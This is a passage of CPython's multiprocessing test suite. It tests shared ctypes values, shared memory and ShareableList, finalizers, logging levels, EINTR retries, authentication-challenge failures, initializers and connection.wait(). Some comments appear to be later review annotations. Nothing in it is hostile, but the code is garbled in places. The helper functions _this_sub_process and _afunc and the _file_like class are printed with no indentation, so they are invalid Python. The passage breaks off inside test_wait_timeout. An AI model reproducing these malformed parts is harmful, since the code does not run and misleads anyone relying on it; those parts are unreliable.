        # Make sure the GC is enabled, and set lower collection thresholds to
        # make collections more frequent (and increase the probability of
        # deadlock).
        if not gc.isenabled():
            gc.enable()
            self.addCleanup(gc.disable)
        thresholds = gc.get_threshold()
        self.addCleanup(gc.set_threshold, *thresholds)
        gc.set_threshold(10)

        # perform numerous block allocations, with cyclic references to make
        # sure objects are collected asynchronously by the gc
        for i in range(5000):
            a = multiprocessing.heap.BufferWrapper(1)
            b = multiprocessing.heap.BufferWrapper(1)
            # circular references
            a.buddy = b
            b.buddy = a
#
#
#
class _Foo(Structure):
    """ctypes structure used by the sharedctypes tests below."""
    # NOTE: field order defines the in-memory layout shared between
    # processes; do not reorder.
    _fields_ = [
        ('x', c_int),
        ('y', c_double),
        ('z', c_longlong,)
    ]
class _TestSharedCTypes(BaseTestCase):
    """Tests for multiprocessing.sharedctypes (shared Value/Array)."""

    ALLOWED_TYPES = ('processes',)

    def setUp(self):
        if not HAS_SHAREDCTYPES:
            self.skipTest("requires multiprocessing.sharedctypes")

    @classmethod
    def _double(cls, x, y, z, foo, arr, string):
        # Child helper: double every shared value in place; the parent
        # then checks the changes are visible across the process boundary.
        x.value *= 2
        y.value *= 2
        z.value *= 2
        foo.x *= 2
        foo.y *= 2
        string.value *= 2
        for i in range(len(arr)):
            arr[i] *= 2

    def test_sharedctypes(self, lock=False):
        x = Value('i', 7, lock=lock)
        y = Value(c_double, 1.0/3.0, lock=lock)
        z = Value(c_longlong, 2 ** 33, lock=lock)
        foo = Value(_Foo, 3, 2, lock=lock)
        arr = self.Array('d', list(range(10)), lock=lock)
        string = self.Array('c', 20, lock=lock)
        string.value = latin('hello')

        p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
        p.daemon = True
        p.start()
        p.join()

        self.assertEqual(x.value, 14)
        self.assertAlmostEqual(y.value, 2.0/3.0)
        self.assertEqual(z.value, 2 ** 34)
        self.assertEqual(foo.x, 6)
        self.assertAlmostEqual(foo.y, 4.0)
        for i in range(10):
            self.assertAlmostEqual(arr[i], i*2)
        self.assertEqual(string.value, latin('hellohello'))

    def test_synchronize(self):
        # Same as test_sharedctypes but with synchronization wrappers.
        self.test_sharedctypes(lock=True)

    def test_copy(self):
        # ctypes copy() must produce an independent snapshot.
        foo = _Foo(2, 5.0, 2 ** 33)
        bar = copy(foo)
        foo.x = 0
        foo.y = 0
        foo.z = 0
        self.assertEqual(bar.x, 2)
        self.assertAlmostEqual(bar.y, 5.0)
        self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
    """Tests for multiprocessing.shared_memory: SharedMemory,
    ShareableList and SharedMemoryManager."""

    ALLOWED_TYPES = ('processes',)

    @staticmethod
    def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
        # Child-process helper: attach to an existing segment (by name, or
        # via an unpickled SharedMemory object) and write *binary_data*.
        if isinstance(shmem_name_or_obj, str):
            local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
        else:
            local_sms = shmem_name_or_obj
        local_sms.buf[:len(binary_data)] = binary_data
        local_sms.close()

    def test_shared_memory_basics(self):
        """Creation, attachment, size handling and error cases."""
        sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
        self.addCleanup(sms.unlink)

        # Verify attributes are readable.
        self.assertEqual(sms.name, 'test01_tsmb')
        self.assertGreaterEqual(sms.size, 512)
        self.assertGreaterEqual(len(sms.buf), sms.size)

        # Modify contents of shared memory segment through memoryview.
        sms.buf[0] = 42
        self.assertEqual(sms.buf[0], 42)

        # Attach to existing shared memory segment.
        also_sms = shared_memory.SharedMemory('test01_tsmb')
        self.assertEqual(also_sms.buf[0], 42)
        also_sms.close()

        # Attach to existing shared memory segment but specify a new size.
        same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
        self.assertLess(same_sms.size, 20*sms.size)  # Size was ignored.
        same_sms.close()

        # Creating Shared Memory Segment with -ve size
        with self.assertRaises(ValueError):
            shared_memory.SharedMemory(create=True, size=-2)

        # Attaching Shared Memory Segment without a name
        with self.assertRaises(ValueError):
            shared_memory.SharedMemory(create=False)

        # Test if shared memory segment is created properly,
        # when _make_filename returns an existing shared memory segment name
        with unittest.mock.patch(
            'multiprocessing.shared_memory._make_filename') as mock_make_filename:

            NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
            names = ['test01_fn', 'test02_fn']
            # Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
            # because some POSIX compliant systems require name to start with /
            names = [NAME_PREFIX + name for name in names]

            mock_make_filename.side_effect = names
            shm1 = shared_memory.SharedMemory(create=True, size=1)
            self.addCleanup(shm1.unlink)
            self.assertEqual(shm1._name, names[0])

            # A second creation attempt must skip the colliding first name
            # and land on the second one.
            mock_make_filename.side_effect = names
            shm2 = shared_memory.SharedMemory(create=True, size=1)
            self.addCleanup(shm2.unlink)
            self.assertEqual(shm2._name, names[1])

        if shared_memory._USE_POSIX:
            # Posix Shared Memory can only be unlinked once.  Here we
            # test an implementation detail that is not observed across
            # all supported platforms (since WindowsNamedSharedMemory
            # manages unlinking on its own and unlink() does nothing).
            # True release of shared memory segment does not necessarily
            # happen until process exits, depending on the OS platform.
            with self.assertRaises(FileNotFoundError):
                sms_uno = shared_memory.SharedMemory(
                    'test01_dblunlink',
                    create=True,
                    size=5000
                )

                try:
                    self.assertGreaterEqual(sms_uno.size, 5000)

                    sms_duo = shared_memory.SharedMemory('test01_dblunlink')
                    sms_duo.unlink()  # First shm_unlink() call.
                    sms_duo.close()
                    sms_uno.close()

                finally:
                    sms_uno.unlink()  # A second shm_unlink() call is bad.

        with self.assertRaises(FileExistsError):
            # Attempting to create a new shared memory segment with a
            # name that is already in use triggers an exception.
            there_can_only_be_one_sms = shared_memory.SharedMemory(
                'test01_tsmb',
                create=True,
                size=512
            )

        if shared_memory._USE_POSIX:
            # Requesting creation of a shared memory segment with the option
            # to attach to an existing segment, if that name is currently in
            # use, should not trigger an exception.
            # Note:  Using a smaller size could possibly cause truncation of
            # the existing segment but is OS platform dependent.  In the
            # case of MacOS/darwin, requesting a smaller size is disallowed.
            class OptionalAttachSharedMemory(shared_memory.SharedMemory):
                _flags = os.O_CREAT | os.O_RDWR
            ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
            self.assertEqual(ok_if_exists_sms.size, sms.size)
            ok_if_exists_sms.close()

        # Attempting to attach to an existing shared memory segment when
        # no segment exists with the supplied name triggers an exception.
        with self.assertRaises(FileNotFoundError):
            nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
            nonexisting_sms.unlink()  # Error should occur on prior line.

        sms.close()

        # Test creating a shared memory segment with negative size
        with self.assertRaises(ValueError):
            sms_invalid = shared_memory.SharedMemory(create=True, size=-1)

        # Test creating a shared memory segment with size 0
        with self.assertRaises(ValueError):
            sms_invalid = shared_memory.SharedMemory(create=True, size=0)

        # Test creating a shared memory segment without size argument
        with self.assertRaises(ValueError):
            sms_invalid = shared_memory.SharedMemory(create=True)

    def test_shared_memory_across_processes(self):
        """A segment is reachable from a child both by name and by
        pickling the SharedMemory object itself."""
        # bpo-40135: don't define shared memory block's name in case of
        # the failure when we run multiprocessing tests in parallel.
        sms = shared_memory.SharedMemory(create=True, size=512)
        self.addCleanup(sms.unlink)

        # Verify remote attachment to existing block by name is working.
        p = self.Process(
            target=self._attach_existing_shmem_then_write,
            args=(sms.name, b'howdy')
        )
        p.daemon = True
        p.start()
        p.join()
        self.assertEqual(bytes(sms.buf[:5]), b'howdy')

        # Verify pickling of SharedMemory instance also works.
        p = self.Process(
            target=self._attach_existing_shmem_then_write,
            args=(sms, b'HELLO')
        )
        p.daemon = True
        p.start()
        p.join()
        self.assertEqual(bytes(sms.buf[:5]), b'HELLO')

        sms.close()

    @unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
    def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
        # bpo-36368: protect SharedMemoryManager server process from
        # KeyboardInterrupt signals.
        smm = multiprocessing.managers.SharedMemoryManager()
        smm.start()

        # make sure the manager works properly at the beginning
        sl = smm.ShareableList(range(10))

        # the manager's server should ignore KeyboardInterrupt signals, and
        # maintain its connection with the current process, and success when
        # asked to deliver memory segments.
        os.kill(smm._process.pid, signal.SIGINT)

        sl2 = smm.ShareableList(range(10))

        # test that the custom signal handler registered in the Manager does
        # not affect signal handling in the parent process.
        with self.assertRaises(KeyboardInterrupt):
            os.kill(os.getpid(), signal.SIGINT)

        smm.shutdown()

    @unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
    def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
        # bpo-36867: test that a SharedMemoryManager uses the
        # same resource_tracker process as its parent.
        cmd = '''if 1:
            from multiprocessing.managers import SharedMemoryManager


            smm = SharedMemoryManager()
            smm.start()
            sl = smm.ShareableList(range(10))
            smm.shutdown()
        '''
        rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)

        # Before bpo-36867 was fixed, a SharedMemoryManager not using the same
        # resource_tracker process as its parent would make the parent's
        # tracker complain about sl being leaked even though smm.shutdown()
        # properly released sl.
        self.assertFalse(err)

    def test_shared_memory_SharedMemoryManager_basics(self):
        """Manager lifecycle: segments live while the manager runs and are
        released on shutdown (POSIX only; Windows frees at process exit)."""
        smm1 = multiprocessing.managers.SharedMemoryManager()
        with self.assertRaises(ValueError):
            smm1.SharedMemory(size=9)  # Fails if SharedMemoryServer not started
        smm1.start()
        lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
        lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
        doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
        self.assertEqual(len(doppleganger_list0), 5)
        doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
        self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
        held_name = lom[0].name
        smm1.shutdown()
        if sys.platform != "win32":
            # Calls to unlink() have no effect on Windows platform; shared
            # memory will only be released once final process exits.
            with self.assertRaises(FileNotFoundError):
                # No longer there to be attached to again.
                absent_shm = shared_memory.SharedMemory(name=held_name)

        with multiprocessing.managers.SharedMemoryManager() as smm2:
            sl = smm2.ShareableList("howdy")
            shm = smm2.SharedMemory(size=128)
            held_name = sl.shm.name
        if sys.platform != "win32":
            with self.assertRaises(FileNotFoundError):
                # No longer there to be attached to again.
                absent_sl = shared_memory.ShareableList(name=held_name)

    def test_shared_memory_ShareableList_basics(self):
        """Element access, mutation, format changes and duplication."""
        sl = shared_memory.ShareableList(
            ['howdy', b'HoWdY', -273.154, 100, None, True, 42]
        )
        self.addCleanup(sl.shm.unlink)

        # Verify attributes are readable.
        self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')

        # Exercise len().
        self.assertEqual(len(sl), 7)

        # Exercise index().
        with warnings.catch_warnings():
            # Suppress BytesWarning when comparing against b'HoWdY'.
            warnings.simplefilter('ignore')
            with self.assertRaises(ValueError):
                sl.index('100')
            self.assertEqual(sl.index(100), 3)

        # Exercise retrieving individual values.
        self.assertEqual(sl[0], 'howdy')
        self.assertEqual(sl[-2], True)

        # Exercise iterability.
        self.assertEqual(
            tuple(sl),
            ('howdy', b'HoWdY', -273.154, 100, None, True, 42)
        )

        # Exercise modifying individual values.
        sl[3] = 42
        self.assertEqual(sl[3], 42)
        sl[4] = 'some'  # Change type at a given position.
        self.assertEqual(sl[4], 'some')
        self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
        with self.assertRaisesRegex(ValueError,
                                    "exceeds available storage"):
            sl[4] = 'far too many'
        self.assertEqual(sl[4], 'some')
        sl[0] = 'encodés'  # Exactly 8 bytes of UTF-8 data
        self.assertEqual(sl[0], 'encodés')
        self.assertEqual(sl[1], b'HoWdY')  # no spillage
        with self.assertRaisesRegex(ValueError,
                                    "exceeds available storage"):
            sl[0] = 'encodées'  # Exactly 9 bytes of UTF-8 data
        self.assertEqual(sl[1], b'HoWdY')
        with self.assertRaisesRegex(ValueError,
                                    "exceeds available storage"):
            sl[1] = b'123456789'
        self.assertEqual(sl[1], b'HoWdY')

        # Exercise count().
        with warnings.catch_warnings():
            # Suppress BytesWarning when comparing against b'HoWdY'.
            warnings.simplefilter('ignore')
            self.assertEqual(sl.count(42), 2)
            self.assertEqual(sl.count(b'HoWdY'), 1)
            self.assertEqual(sl.count(b'adios'), 0)

        # Exercise creating a duplicate.
        sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
        try:
            self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
            self.assertEqual('test03_duplicate', sl_copy.shm.name)
            self.assertEqual(list(sl), list(sl_copy))
            self.assertEqual(sl.format, sl_copy.format)
            sl_copy[-1] = 77
            self.assertEqual(sl_copy[-1], 77)
            self.assertNotEqual(sl[-1], 77)
            sl_copy.shm.close()
        finally:
            sl_copy.shm.unlink()

        # Obtain a second handle on the same ShareableList.
        sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
        self.assertEqual(sl.shm.name, sl_tethered.shm.name)
        sl_tethered[-1] = 880
        self.assertEqual(sl[-1], 880)
        sl_tethered.shm.close()
        sl.shm.close()

        # Exercise creating an empty ShareableList.
        empty_sl = shared_memory.ShareableList()
        try:
            self.assertEqual(len(empty_sl), 0)
            self.assertEqual(empty_sl.format, '')
            self.assertEqual(empty_sl.count('any'), 0)
            with self.assertRaises(ValueError):
                empty_sl.index(None)
            empty_sl.shm.close()
        finally:
            empty_sl.shm.unlink()

    def test_shared_memory_ShareableList_pickling(self):
        """Pickling a ShareableList serializes only the segment name, and
        the unpickled copy shares the same underlying memory."""
        sl = shared_memory.ShareableList(range(10))
        self.addCleanup(sl.shm.unlink)

        serialized_sl = pickle.dumps(sl)
        deserialized_sl = pickle.loads(serialized_sl)
        self.assertIsInstance(deserialized_sl, shared_memory.ShareableList)
        # Fixed: was assertTrue(deserialized_sl[-1], 9), which passed 9 as
        # the *msg* argument and asserted nothing about the value.
        self.assertEqual(deserialized_sl[-1], 9)
        self.assertIsNot(sl, deserialized_sl)
        # Both objects view the same shared memory.
        deserialized_sl[4] = "changed"
        self.assertEqual(sl[4], "changed")

        # Verify data is not being put into the pickled representation.
        name = 'a' * len(sl.shm.name)
        larger_sl = shared_memory.ShareableList(range(400))
        self.addCleanup(larger_sl.shm.unlink)
        serialized_larger_sl = pickle.dumps(larger_sl)
        self.assertEqual(len(serialized_sl), len(serialized_larger_sl))
        larger_sl.shm.close()

        deserialized_sl.shm.close()
        sl.shm.close()

    def test_shared_memory_cleaned_after_process_termination(self):
        """The resource tracker must reclaim a segment leaked by an
        abruptly terminated process (POSIX)."""
        cmd = '''if 1:
            import os, time, sys
            from multiprocessing import shared_memory

            # Create a shared_memory segment, and send the segment name
            sm = shared_memory.SharedMemory(create=True, size=10)
            sys.stdout.write(sm.name + '\\n')
            sys.stdout.flush()
            time.sleep(100)
        '''
        with subprocess.Popen([sys.executable, '-E', '-c', cmd],
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE) as p:
            name = p.stdout.readline().strip().decode()

            # killing abruptly processes holding reference to a shared memory
            # segment should not leak the given memory segment.
            p.terminate()
            p.wait()

            # Poll with exponential backoff until the tracker has cleaned
            # the segment up, or the deadline passes.
            deadline = time.monotonic() + support.LONG_TIMEOUT
            t = 0.1
            while time.monotonic() < deadline:
                time.sleep(t)
                t = min(t*2, 5)
                try:
                    smm = shared_memory.SharedMemory(name, create=False)
                except FileNotFoundError:
                    break
            else:
                raise AssertionError("A SharedMemory segment was leaked after"
                                     " a process was abruptly terminated.")

            if os.name == 'posix':
                # A warning was emitted by the subprocess' own
                # resource_tracker (on Windows, shared memory segments
                # are released automatically by the OS).
                err = p.stderr.read().decode()
                self.assertIn(
                    "resource_tracker: There appear to be 1 leaked "
                    "shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
    """Tests for util.Finalize callbacks and exit-priority ordering."""

    ALLOWED_TYPES = ('processes',)

    def setUp(self):
        # Run against an empty finalizer registry; restore it afterwards.
        self.registry_backup = util._finalizer_registry.copy()
        util._finalizer_registry.clear()

    def tearDown(self):
        self.assertFalse(util._finalizer_registry)
        util._finalizer_registry.update(self.registry_backup)

    @classmethod
    def _test_finalize(cls, conn):
        class Foo(object):
            pass

        a = Foo()
        util.Finalize(a, conn.send, args=('a',))
        del a  # triggers callback for a

        b = Foo()
        close_b = util.Finalize(b, conn.send, args=('b',))
        close_b()  # triggers callback for b
        close_b()  # does nothing because callback has already been called
        del b  # does nothing because callback has already been called

        c = Foo()
        util.Finalize(c, conn.send, args=('c',))

        d10 = Foo()
        util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)

        d01 = Foo()
        util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
        d02 = Foo()
        util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
        d03 = Foo()
        util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)

        util.Finalize(None, conn.send, args=('e',), exitpriority=-10)

        util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)

        # call multiprocessing's cleanup function then exit process without
        # garbage collecting locals
        util._exit_function()
        conn.close()
        os._exit(0)

    def test_finalize(self):
        conn, child_conn = self.Pipe()

        p = self.Process(target=self._test_finalize, args=(child_conn,))
        p.daemon = True
        p.start()
        p.join()

        result = [obj for obj in iter(conn.recv, 'STOP')]
        # Higher exitpriority runs first; equal priorities run LIFO; 'c'
        # (no exitpriority) is not run by _exit_function.
        self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])

    def test_thread_safety(self):
        # bpo-24484: _run_finalizers() should be thread-safe
        def cb():
            pass

        class Foo(object):
            def __init__(self):
                self.ref = self  # create reference cycle
                # insert finalizer at random key
                util.Finalize(self, cb, exitpriority=random.randint(1, 100))

        finish = False
        exc = None

        def run_finalizers():
            nonlocal exc
            while not finish:
                time.sleep(random.random() * 1e-1)
                try:
                    # A GC run will eventually happen during this,
                    # collecting stale Foo's and mutating the registry
                    util._run_finalizers()
                except Exception as e:
                    exc = e

        def make_finalizers():
            nonlocal exc
            d = {}
            while not finish:
                try:
                    # Old Foo's get gradually replaced and later
                    # collected by the GC (because of the cyclic ref)
                    d[random.getrandbits(5)] = {Foo() for i in range(10)}
                except Exception as e:
                    exc = e
                    d.clear()

        old_interval = sys.getswitchinterval()
        old_threshold = gc.get_threshold()
        try:
            # Tiny switch interval + aggressive GC maximize the chance of
            # the two threads racing on the registry.
            sys.setswitchinterval(1e-6)
            gc.set_threshold(5, 5, 5)
            threads = [threading.Thread(target=run_finalizers),
                       threading.Thread(target=make_finalizers)]
            with test.support.start_threads(threads):
                time.sleep(4.0)  # Wait a bit to trigger race condition
            finish = True
            if exc is not None:
                raise exc
        finally:
            sys.setswitchinterval(old_interval)
            gc.set_threshold(*old_threshold)
            gc.collect()  # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
    """Check that every multiprocessing submodule declares a sane __all__."""

    def get_module_names(self):
        # Enumerate 'multiprocessing.<mod>' for each .py file in the package.
        import glob
        folder = os.path.dirname(multiprocessing.__file__)
        pattern = os.path.join(glob.escape(folder), '*.py')
        files = glob.glob(pattern)
        modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
        modules = ['multiprocessing.' + m for m in modules]
        modules.remove('multiprocessing.__init__')
        modules.append('multiprocessing')
        return modules

    def test_import(self):
        modules = self.get_module_names()
        # Drop the modules that cannot be imported on this platform/build.
        if sys.platform == 'win32':
            modules.remove('multiprocessing.popen_fork')
            modules.remove('multiprocessing.popen_forkserver')
            modules.remove('multiprocessing.popen_spawn_posix')
        else:
            modules.remove('multiprocessing.popen_spawn_win32')
            if not HAS_REDUCTION:
                modules.remove('multiprocessing.popen_forkserver')

        if c_int is None:
            # This module requires _ctypes
            modules.remove('multiprocessing.sharedctypes')

        for name in modules:
            __import__(name)
            mod = sys.modules[name]
            self.assertTrue(hasattr(mod, '__all__'), name)

            # Every name advertised by __all__ must actually exist.
            for attr in mod.__all__:
                self.assertTrue(
                    hasattr(mod, attr),
                    '%r does not have attribute %r' % (mod, attr)
                    )
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
    """Quick test that logging works -- does not test logging output."""

    ALLOWED_TYPES = ('processes',)

    def test_enable_logging(self):
        logger = multiprocessing.get_logger()
        logger.setLevel(util.SUBWARNING)
        self.assertTrue(logger is not None)
        logger.debug('this will not be printed')
        logger.info('nor will this')
        logger.setLevel(LOG_LEVEL)

    @classmethod
    def _test_level(cls, conn):
        # Child helper: report the effective level seen in the child.
        logger = multiprocessing.get_logger()
        conn.send(logger.getEffectiveLevel())

    def test_level(self):
        LEVEL1 = 32
        LEVEL2 = 37

        logger = multiprocessing.get_logger()
        root_logger = logging.getLogger()
        root_level = root_logger.level

        reader, writer = multiprocessing.Pipe(duplex=False)

        # An explicit level on the multiprocessing logger must be seen
        # by child processes.
        logger.setLevel(LEVEL1)
        p = self.Process(target=self._test_level, args=(writer,))
        p.start()
        self.assertEqual(LEVEL1, reader.recv())
        p.join()
        p.close()

        # With NOTSET, the effective level falls back to the root logger's.
        logger.setLevel(logging.NOTSET)
        root_logger.setLevel(LEVEL2)
        p = self.Process(target=self._test_level, args=(writer,))
        p.start()
        self.assertEqual(LEVEL2, reader.recv())
        p.join()
        p.close()

        root_logger.setLevel(root_level)
        logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
    """Check that Process.join() retries if os.waitpid() fails with EINTR."""

    ALLOWED_TYPES = ('processes',)

    @classmethod
    def _killer(cls, pid):
        # Child helper: signal the parent while it is blocked in join().
        time.sleep(0.1)
        os.kill(pid, signal.SIGUSR1)

    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
    def test_poll_eintr(self):
        got_signal = [False]
        def record(*args):
            got_signal[0] = True
        pid = os.getpid()
        oldhandler = signal.signal(signal.SIGUSR1, record)
        try:
            killer = self.Process(target=self._killer, args=(pid,))
            killer.start()
            try:
                p = self.Process(target=time.sleep, args=(2,))
                p.start()
                # join() must survive being interrupted by SIGUSR1.
                p.join()
            finally:
                killer.join()
            self.assertTrue(got_signal[0])
            self.assertEqual(p.exitcode, 0)
        finally:
            signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
    """Test handle verification, see issue 3321."""

    @unittest.skipIf(WIN32, "skipped on Windows")
    def test_invalid_handles(self):
        # Construct a Connection around a bogus descriptor number.
        conn = multiprocessing.connection.Connection(44977608)
        # check that poll() doesn't crash
        try:
            conn.poll()
        except (ValueError, OSError):
            pass
        finally:
            # Hack private attribute _handle to avoid printing an error
            # in conn.__del__
            conn._handle = None
        # A negative handle must be rejected outright.
        self.assertRaises((ValueError, OSError),
                          multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
    """Tests for the connection authentication challenge protocol."""
    # TODO: add more tests for deliver/answer challenge.

    def test_deliver_challenge_auth_failure(self):
        class _FakeConnection(object):
            # Always answers with garbage, so authentication must fail.
            def recv_bytes(self, size):
                return b'something bogus'
            def send_bytes(self, data):
                pass
        with self.assertRaises(multiprocessing.AuthenticationError):
            multiprocessing.connection.deliver_challenge(
                _FakeConnection(), b'abc')

    def test_answer_challenge_auth_failure(self):
        class _FakeConnection(object):
            def __init__(self):
                self.count = 0
            def recv_bytes(self, size):
                # First a valid CHALLENGE header, then garbage, then EOF.
                self.count += 1
                if self.count == 1:
                    return multiprocessing.connection.CHALLENGE
                if self.count == 2:
                    return b'something bogus'
                return b''
            def send_bytes(self, data):
                pass
        with self.assertRaises(multiprocessing.AuthenticationError):
            multiprocessing.connection.answer_challenge(
                _FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
    # Bump the shared counter so tests can tell the initializer ran.
    ns.test = ns.test + 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
    """Test the Manager.start()/Pool.__init__() initializer feature
    (issue 5585); the initializer increments ``self.ns.test`` once."""
    def setUp(self):
        self.mgr = multiprocessing.Manager()
        self.ns = self.mgr.Namespace()
        self.ns.test = 0
    def tearDown(self):
        self.mgr.shutdown()
        self.mgr.join()
    def test_manager_initializer(self):
        m = multiprocessing.managers.SyncManager()
        # A non-callable initializer must be rejected.
        self.assertRaises(TypeError, m.start, 1)
        m.start(initializer, (self.ns,))
        self.assertEqual(self.ns.test, 1)
        m.shutdown()
        m.join()
    def test_pool_initializer(self):
        # A non-callable initializer must be rejected.
        self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
        p = multiprocessing.Pool(1, initializer, (self.ns,))
        p.close()
        p.join()
        self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno()) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
    # Spawn a daemon child that tries to read from an (empty) queue,
    # then wait for it to finish.
    q = multiprocessing.Queue()
    worker = multiprocessing.Process(target=_this_sub_process, args=(q,))
    worker.daemon = True
    worker.start()
    worker.join()
def _afunc(x):
return x*x
def pool_in_process():
    # Create a Pool and run a small map job (invoked inside a child
    # process by TestStdinBadfiledescriptor).  close()/join() are called
    # explicitly: a ``with`` block would terminate() instead.
    pool = multiprocessing.Pool(processes=4)
    squares = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
    pool.close()
    pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
    """Issues 5155, 5313, 5331: using multiprocessing from inside a child
    process, and flushing a per-process buffered stream."""

    def test_queue_in_process(self):
        # A child process must be able to create and use a Queue.
        proc = multiprocessing.Process(target=_test_process)
        proc.start()
        proc.join()

    def test_pool_in_process(self):
        # A child process must be able to create and use a Pool.
        p = multiprocessing.Process(target=pool_in_process)
        p.start()
        p.join()

    def test_flushing(self):
        sio = io.StringIO()
        flike = _file_like(sio)
        flike.write('foo')
        # NOTE(review): this Process is constructed but never started;
        # presumably a leftover -- confirm before removing (Process
        # construction itself has registry side effects).
        proc = multiprocessing.Process(target=lambda: flike.flush())
        flike.flush()
        # Bug fix: this was a bare ``assert``, which is stripped under
        # ``python -O`` and silently made the check a no-op.
        self.assertEqual(sio.getvalue(), 'foo')
class TestWait(unittest.TestCase):
    """Tests for multiprocessing.connection.wait()."""
    @classmethod
    def _child_test_wait(cls, w, slow):
        # Child: send ten (index, pid) tuples, optionally with small delays.
        for i in range(10):
            if slow:
                time.sleep(random.random()*0.1)
            w.send((i, os.getpid()))
        w.close()
    def test_wait(self, slow=False):
        from multiprocessing.connection import wait
        readers = []
        procs = []
        messages = []
        for i in range(4):
            r, w = multiprocessing.Pipe(duplex=False)
            p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
            p.daemon = True
            p.start()
            w.close()  # parent's copy; the child keeps its own end open
            readers.append(r)
            procs.append(p)
            self.addCleanup(p.join)
        # Drain every reader until its writer closes (EOFError).
        while readers:
            for r in wait(readers):
                try:
                    msg = r.recv()
                except EOFError:
                    readers.remove(r)
                    r.close()
                else:
                    messages.append(msg)
        messages.sort()
        expected = sorted((i, p.pid) for i in range(10) for p in procs)
        self.assertEqual(messages, expected)
    @classmethod
    def _child_test_wait_socket(cls, address, slow):
        # Child: connect to the listening socket and send ten lines.
        s = socket.socket()
        s.connect(address)
        for i in range(10):
            if slow:
                time.sleep(random.random()*0.1)
            s.sendall(('%s\n' % i).encode('ascii'))
        s.close()
    def test_wait_socket(self, slow=False):
        # wait() also accepts plain sockets, not just Connections.
        from multiprocessing.connection import wait
        l = socket.create_server((socket_helper.HOST, 0))
        addr = l.getsockname()
        readers = []
        procs = []
        dic = {}
        for i in range(4):
            p = multiprocessing.Process(target=self._child_test_wait_socket,
                                        args=(addr, slow))
            p.daemon = True
            p.start()
            procs.append(p)
            self.addCleanup(p.join)
        for i in range(4):
            r, _ = l.accept()
            readers.append(r)
            dic[r] = []
        l.close()
        # Read until each peer closes (empty recv() means EOF).
        while readers:
            for r in wait(readers):
                msg = r.recv(32)
                if not msg:
                    readers.remove(r)
                    r.close()
                else:
                    dic[r].append(msg)
        expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
        for v in dic.values():
            self.assertEqual(b''.join(v), expected)
    def test_wait_slow(self):
        self.test_wait(True)
    def test_wait_socket_slow(self):
        self.test_wait_socket(True)
    def test_wait_timeout(self):
        from multiprocessing.connection import wait
        expected = 5
        a, b = multiprocessing.Pipe()
        # Nothing ready: wait() should time out after ~`expected` seconds.
        start = time.monotonic()
        res = wait([a, b], expected)
        delta = time.monotonic() - start
        self.assertEqual(res, [])
